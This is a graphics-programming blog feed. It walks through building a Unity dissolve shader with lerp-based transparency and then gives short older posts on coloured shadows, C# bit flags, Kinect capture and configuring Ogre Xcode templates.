<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The Input struct defines what information we need to access about each vertex in the model being shaded. In this case, all we need are uv co-ordinates for each of the textures that we’re using. Defining these variables as “uv_” and then a texture name will automatically pull the correct uv’s for that texture.</p>
<p>The surface shader system will handle dealing with the position and normal variables as it needs to, but we don’t need to worry about that.</p>
<p>The surf function that I defined is just a boilerplate surface function. It takes the input we defined, and modifies a SurfaceOutput struct for Unity. This SurfaceOutput data will control what the fragment actually gets shaded as.</p>
<p>The o.Albedo line shows how to set the colour of a fragment. In this case, all we’re doing is assigning each fragment the color white. We’re going to modify this now. The next example will show how to set a fragment to the colour it should be to display _MainTex properly.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you’ve worked at all with shaders before, this should make sense: we’re looking up the colour at the position in the texture defined by the uv for this position on the mesh. o.Albedo doesn’t set the alpha of our fragment, so we use .rgb to trim the alpha from the sampled colour.</p>
<p>I’ve gone ahead and defined a clear variable (this is a 4 element vector with r g b and a set to 0.0) and grabbed the color of this position in the dissolve map texture as well.</p>
<p>Now we need to get to the good stuff: how to decide whether a given fragment should be shaded with the main texture, the line color, or the clear color.</p>
<h2>The Good Stuff</h2>
<p>We’re going to decide how to shade each fragment based on the red channel of the dissolve map. If the red value of that texture is above the value of _DissolveVal, we are going to shade that fragment with the line colour. If it is above the value of _DissolveVal + _LineWidth, the fragment will be transparent.</p>
<p>In a regular script, this would usually be done with an if/else statement, but unfortunately shaders don’t always handle if/else flows that well. You’ll get the correct value, but on many GPUs the shader can end up executing the code for every possible outcome before choosing the correct one. It’s often faster (and more shader-y) to use lerp for this. Lerp will mix two values together based on a third float value (if this value is 0, we end up with 100% of value A; if it is 1, we get 100% of value B). If we only ever pass in 0 or 1, that behaves just like an if statement.</p>
<p>We’re going to define a couple of integers that will serve as our conditionals. The first choice we need to make is whether or not we are transparent. As stated before, we are only transparent if the red value of dissolve is greater than _DissolveVal + _LineWidth.</p>
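<p>To make the comparison with an if statement concrete, here is a minimal CPU-side sketch in C++ (not shader code). The <code>lerpScalar</code> and <code>pickByFlag</code> helpers are hypothetical names made up for this illustration; <code>lerpScalar</code> just stands in for the shader’s built-in lerp on a single float.</p>

```cpp
// Hypothetical CPU-side stand-in for the shader's built-in lerp (one float only).
// Written as a weighted sum so that t == 0 returns a and t == 1 returns b exactly.
float lerpScalar(float a, float b, float t)
{
    return a * (1.0f - t) + b * t;
}

// Branch-free selection: flag is expected to be exactly 0 or 1.
// Gives the same result as: flag ? ifOne : ifZero
float pickByFlag(float ifZero, float ifOne, int flag)
{
    return lerpScalar(ifZero, ifOne, static_cast<float>(flag));
}
```

<p>Calling <code>pickByFlag(0.25f, 0.75f, 0)</code> gives back the first value and <code>pickByFlag(0.25f, 0.75f, 1)</code> gives back the second, with no branch involved. Anything between 0 and 1 would blend the two, which is why the flag needs to be a clean 0 or 1.</p>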
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
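<p>The two ints do what their names imply. isClear resolves to 0 if dissolve.r isn’t greater than _DissolveVal + _LineWidth, and isAtLeastLine will be 0 if we should use the regular texture instead of the line color or transparency. Casting to int throws away the fractional part, so adding 0.99 before the cast turns a difference of about 0.01 or more into a nonzero value and leaves anything smaller at 0.</p>
<p>Once we have those two values, the rest is pretty straightforward.</p>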
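<p>If the + 0.99 trick looks a bit magic, here is a small CPU-side C++ sketch of the same arithmetic. Both function names are hypothetical, and the sketch assumes the shader’s int() cast truncates toward zero the same way a C++ cast does. The second function is only there for comparison; it is not what the shader in this post uses.</p>

```cpp
// Mirrors the shader expression int(value - threshold + 0.99).
// Assumption: the cast truncates toward zero, like static_cast<int> in C++.
int truncFlag(float value, float threshold)
{
    return static_cast<int>(value - threshold + 0.99f);
}

// Hypothetical alternative for comparison: a strict test that can only be 0 or 1.
int compareFlag(float value, float threshold)
{
    return value > threshold ? 1 : 0;
}
```

<p>With a red value of 0.5 and a threshold of 0.3, truncFlag returns 1; swap the two numbers and it returns 0. One thing to watch: if the red value is more than about 1.01 above the threshold (for example a red value of 1.0 against a threshold of -0.2), truncFlag returns 2 rather than 1, and a flag of 2 would make lerp extrapolate instead of select.</p>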
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">altCol</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">_LineColor</span><span class="p">,</span> <span class="n">clear</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">Albedo</span><span class="p">,</span> <span class="n">altCol</span><span class="p">,</span> <span class="n">isAtLeastLine</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>In case it isn’t clear, the 2 lines we just added first choose whether the alt color is clear or the line color, and then choose whether we should use the main texture or the alt color.</p>
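<p>The whole decision for one fragment can be sketched on the CPU like this. It’s a rough C++ mirror of the surf body, not shader code: the <code>Color</code> struct and the helper names are made up for illustration, and unlike o.Albedo this version carries the alpha channel along so the clear case is visible.</p>

```cpp
// Hypothetical stand-in for a 4 element colour vector.
struct Color { float r, g, b, a; };

// Weighted-sum blend of one channel; exact for t == 0 and t == 1.
static float mixChannel(float a, float b, float t)
{
    return a * (1.0f - t) + b * t;
}

// Per-channel blend of two colours, standing in for the shader's lerp.
static Color mixColor(Color a, Color b, float t)
{
    return { mixChannel(a.r, b.r, t), mixChannel(a.g, b.g, t),
             mixChannel(a.b, b.b, t), mixChannel(a.a, b.a, t) };
}

// Mirrors the two flags and two lerps from the surf function for one fragment.
// dissolveRed is the red channel sampled from the dissolve map.
Color shadeFragment(Color mainTex, Color lineColor,
                    float dissolveRed, float dissolveVal, float lineWidth)
{
    const Color clear = { 0.0f, 0.0f, 0.0f, 0.0f };
    int isClear = static_cast<int>(dissolveRed - (dissolveVal + lineWidth) + 0.99f);
    int isAtLeastLine = static_cast<int>(dissolveRed - dissolveVal + 0.99f);
    // First pick between the line colour and clear...
    Color altCol = mixColor(lineColor, clear, static_cast<float>(isClear));
    // ...then pick between the main texture and that result.
    return mixColor(mainTex, altCol, static_cast<float>(isAtLeastLine));
}
```

<p>With a dissolve value of 0.5 and a line width of 0.1, a dissolve map red value of 0.3 comes back as the main texture colour, 0.55 comes back as the line colour, and 0.9 comes back as clear.</p>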
<p>We’re almost done! If you switch over to Unity now you might notice that nothing is really going transparent, it’s just going black. This is because we haven’t yet told Unity that this will be a transparent shader. Because of the order things are rendered, you need to explicitly tell Unity when a shader will draw transparent fragments. Luckily this is a pretty simple addition to the top of the shader.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span><span class="p">{</span> <span class="s">"Queue"</span> <span class="o">=</span> <span class="s">"Transparent"</span><span class="p">}</span>
<span class="n">Blend</span> <span class="n">SrcAlpha</span> <span class="n">OneMinusSrcAlpha</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">altCol</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">_LineColor</span><span class="p">,</span> <span class="n">clear</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">Albedo</span><span class="p">,</span> <span class="n">altCol</span><span class="p">,</span> <span class="n">isAtLeastLine</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>It takes three lines to make the shader transparent. The Tags line tells Unity to render objects using this shader when it renders transparent geometry, and the Blend line defines how our transparency behaves. The one above tells our shader to use alpha blending (as opposed to additive or multiplicative transparency). Finally, the o.Alpha line defines the transparency of the fragment being shaded.</p>
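<p>To make the blend line a bit more concrete, here is a minimal C++ sketch (not Unity code) of the arithmetic that <code>Blend SrcAlpha OneMinusSrcAlpha</code> asks the GPU to perform on each colour channel, along with the alpha value that the surf function above produces. The function names <code>dissolveAlpha</code> and <code>alphaBlend</code> are made up for illustration; only the formulas come from the shader and the blend mode.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">// CPU-side illustration only; the names below are hypothetical, not Unity API.

// Mirrors the shader: isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99),
// followed by o.Alpha = lerp(1.0, 0.0, isClear), which is the same as 1 - isClear.
constexpr float dissolveAlpha(float dissolveR, float dissolveVal, float lineWidth)
{
    // The int conversion truncates toward zero, so isClear is 0 or 1 as long as
    // dissolveR and the summed threshold (dissolveVal + lineWidth) stay in [0, 1].
    return 1.0f - static_cast&lt;float&gt;(
        static_cast&lt;int&gt;(dissolveR - (dissolveVal + lineWidth) + 0.99f));
}

// Blend SrcAlpha OneMinusSrcAlpha, applied to a single colour channel:
// result = source * sourceAlpha + destination * (1 - sourceAlpha)
constexpr float alphaBlend(float src, float dst, float srcAlpha)
{
    return src * srcAlpha + dst * (1.0f - srcAlpha);
}</code></pre></figure>
<p>With a source alpha of 0, alphaBlend returns the destination colour untouched, which is why the dissolved fragments let whatever is behind the object show through.</p>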
<p>Put all together, you have the Dissolve Diffuse shader from my Dissolve Shader pack! Hopefully this tutorial was helpful. Shoot any feedback you have to me <a href="http://twitter.com/khalladay">on Twitter</a>. Happy shading!</p>
Multi Coloured Shadows In Unity2013-08-13T00:00:00+00:00http://kylehalladay.com/blog/2013/08/13/Coloured-Shadows<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p><strong>UPDATE: I’ve posted a tutorial on how to get coloured shadows working in your project. Check it out <a href="http://kylehalladay.com/all/blog/2014/05/16/Coloured-Shadows-In-Unity.html">here</a></strong></p>
<p>Lately, in my (precious little) free time, I’ve been working on a custom shadow receiver system which will give me greater control over the appearance of soft shadows in Unity. On the surface, it sounds like a fun project. It gets slightly more insane when you take into account that I had never so much as written my own shadow map system before starting this. Crawling is boring, so I tend to jump off (metaphorical) cliffs and hope that I figure out flying, running, landing, and crawling by the time I hit the ground.</p>
<p>At first, I thought I’d actually start from the ground up and simply disable the Unity shadows altogether and substitute my own depth maps. It works pretty well for one light, but I’ve run into issues trying to pass multiple shadow maps to multiple passes in Unity. I’m not yet sure whether that’s a limitation of my own knowledge, or just something that Unity doesn’t let you do. Once I hit that wall though, it occurred to me that it might just be easier to tap into the shadow maps already being generated. It would certainly save a lot of extra scripts, and would benefit from all the work that’s already gone into Unity.</p>
<div align="center">
<img src="/images/post_images/2013-08-13/shadowmap.png" /><br />
<font size="2">
(Manually making shadow maps, the depth map from the light is displayed in the corner)
</font>
</div>
<p><br /></p>
<p>And so, I (once again) entered the wonderful world of undocumented Unity functionality. This time, I ended up delving through the CGInclude files that come with the built in shaders. The result of this was an interesting set of variables defined in the UnityShaderVariables.cginc and AutoLight.cginc files, namely: unity_World2Shadow[4], _ShadowMapTexture, _LightShadowData and the macro UNITY_SAMPLE_SHADOW_PROJ.</p>
<p>Most of the above is self explanatory, but the macro was something I hadn’t thought about. A lot of functionality is wrapped in macros in the built in shaders, which handle the difference between DirectX and GLSL shading.</p>
<p>Once I knew what the internal variables were called, it was pretty easy to get rudimentary hard shadows up and running using the built in shadow map… for one light. I’m still working on getting multiple lights working at once, but, in the interest of enjoying small victories, I figured I’d do something a bit fun with the new shadows I had made. Since I now have complete control over the shader producing the shadows, why not change their colour? Therefore, may I present the most fabulous looking hard shadows ever produced in Unity… probably!</p>
<div align="center">
<img src="/images/post_images/2013-08-13/multi-shadows.png" /><br />
<font size="2">
(The purple's darkness gets set by the depth value for that fragment)
</font>
</div>
<p><br /></p>
<p>A lot of work goes into making games look realistic, but I think that there’s a lot to be said for making games look uniquely different from the norm. Purple shadows are how I’m doing that today :D</p>
<p>As always, send me a message <a href="http://twitter.com/khalladay">on Twitter</a> if you want to chat (especially about games or graphics).</p>
Bit Flags are Pretty Cool2013-04-21T00:00:00+00:00http://kylehalladay.com/blog/2013/04/21/Bit-Flags-Are-Pretty-Cool<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans on updating it. Beware!
</div>
<p><br /></p>
<p>I’ve been working on a prototype for (possibly) my next personal project, and one of the things I’ve needed to do a number of times is store a lot of boolean attributes on different objects. This led to some really terrible looking scripts with a whole host of boolean flags at the top of them, and I decided I needed to find a better way of handling things.
<br />
<br />
I’ve had some fun before with packing a whole bunch of booleans into byte-sized structs using the bit field operator in C++, but I’ve never seen anything like that done in C#, and if I can help it, I try to avoid dealing directly with memory addresses in Unity scripts. Luckily, bit flags seem to do the exact same job (possibly better). To show you what I mean, let me link an example:
<br />
<br /></p>
<script src="https://gist.github.com/khalladay/5432282.js" class="gist"> </script>
<p><br />
So here’s what’s going on: rather than leaving the members of the enum at their default sequential values, you can assign each of them a hex number. Provided each of these hex numbers is a distinct power of 2 (so that each one matches up to a single bit in a byte), you can use all of the regular bitwise operations with these new enum values.</p>
<script src="https://gist.github.com/khalladay/a5ecf560b97f746829b1.js" class="gist"> </script>
<p>Provided the player can only have 1 of each item, you could do an entire inventory this way (not that I think that would be the greatest idea). Nevertheless, it’s certainly handy for fast prototyping, and I’m sure that less contrived examples will find their way into production code at some point.</p>
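<p>Since the snippets above are embedded gists, here is a rough, self-contained sketch of the same idea, written in C++ rather than C#. The <code>Item</code> enum, its members and the helper functions are all invented for illustration and are not the contents of the gists; the only thing carried over is the technique of giving each member its own bit and combining them with bitwise operators.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include &lt;cstdint&gt;

// Hypothetical inventory flags: each member is a distinct power of two,
// so each one occupies exactly one bit of the underlying byte.
enum class Item : std::uint8_t
{
    None   = 0x00,
    Sword  = 0x01,
    Shield = 0x02,
    Potion = 0x04,
    Key    = 0x08
};

// Set a flag: bitwise OR turns the item's bit on.
constexpr Item addItem(Item inventory, Item item)
{
    return static_cast&lt;Item&gt;(static_cast&lt;std::uint8_t&gt;(inventory) |
                             static_cast&lt;std::uint8_t&gt;(item));
}

// Clear a flag: AND with the inverted bit turns the item's bit off.
constexpr Item removeItem(Item inventory, Item item)
{
    return static_cast&lt;Item&gt;(static_cast&lt;std::uint8_t&gt;(inventory) &amp;
                             ~static_cast&lt;std::uint8_t&gt;(item));
}

// Test a flag: the AND is non-zero only if the item's bit is set.
constexpr bool hasItem(Item inventory, Item item)
{
    return (static_cast&lt;std::uint8_t&gt;(inventory) &amp;
            static_cast&lt;std::uint8_t&gt;(item)) != 0;
}</code></pre></figure>
<p>Calling addItem(addItem(Item::None, Item::Sword), Item::Key) gives an inventory for which hasItem reports the sword and the key but not the shield, and the whole thing still fits in a single byte.</p>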
Fun With The Kinect2013-03-11T00:00:00+00:00http://kylehalladay.com/blog/2013/03/11/Fun-with-the-kinect<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>I’ve been playing around with the Kinect this month (I love that thing). I’ve used it in the past with some gesture control and image processing at work, but I hadn’t really considered it as an option for gamedev, mostly because I don’t have an Xbox SDK. I’ve been trying to think of cool ways to use it though, lest it become the coolest dust collector I have in my apartment, and I think I’m on to something this month.</p>
<p>As you’ve probably gathered from my other work, I suck at visual art, and it’s probably my least favourite thing to work on when making a game, so any time I can find a cool way to simplify that process I jump on it (why do you think I got into augmented reality?). This month I’ve been experimenting with capturing the output from a Kinect and using that in place of 3D models. It may not be useful for all situations, but the results are pretty cool, don’t you think?</p>
<p><img src="/images/post_images/fun-with-the-kinect/kinectbody.png" alt="Alt Text" /></p>
Unbreaking the Xcode templates in Xcode 4.52012-12-02T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2012/12/02/Taming-The-Ogre-Part2<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>The Xcode templates that come with Ogre 1.81 are rather frustrating to get working, especially if you don’t know what the cryptic error messages that it spits out at you mean. So I’m here today to walk you step by step through getting a basic Ogre project up and running.</p>
<p>All of this is taken from my experiences trying to get Ogre to work on my machine. Given that the templates bundled with Ogre were written by people much more knowledgeable than me, it wouldn’t surprise me if some of these issues aren’t universal problems. Hopefully my experiences are helpful, even if you only hit one of the numerous issues I describe here.</p>
<h3 id="what-you-will-need">What you will need:</h3>
<ul>
<li>A built version of Ogre 1.81 (see my previous post for how to build this)</li>
<li>The Ogre Xcode templates installed (found in Ogre’s SDK/OSX folder)</li>
</ul>
<p>Note: This tutorial was written based on my experience working with Xcode 4.5, and OS X Lion. YMMV if you’re following along with a different configuration.</p>
<h3 id="starting-the-project">Starting the Project</h3>
<p>Let’s start at ground zero. Open Xcode and do the following:</p>
<p>Start a new project, and select the “Mac OS X Application” template in the Ogre category.
After naming your project, fill in the path to your Ogre SDK with the appropriate value.
Welcome to linker hell.</p>
<p>For some reason, Xcode has the annoying tendency to omit the leading / in the include paths in the OGRE template (regardless of whether you remembered to include one in the path to your SDK). So the first thing that has to be done to make this project buildable is to navigate to your build settings and modify all the file paths located in the Framework Search Paths, Header Search Paths, and Library Search Paths so that they begin with a /.</p>
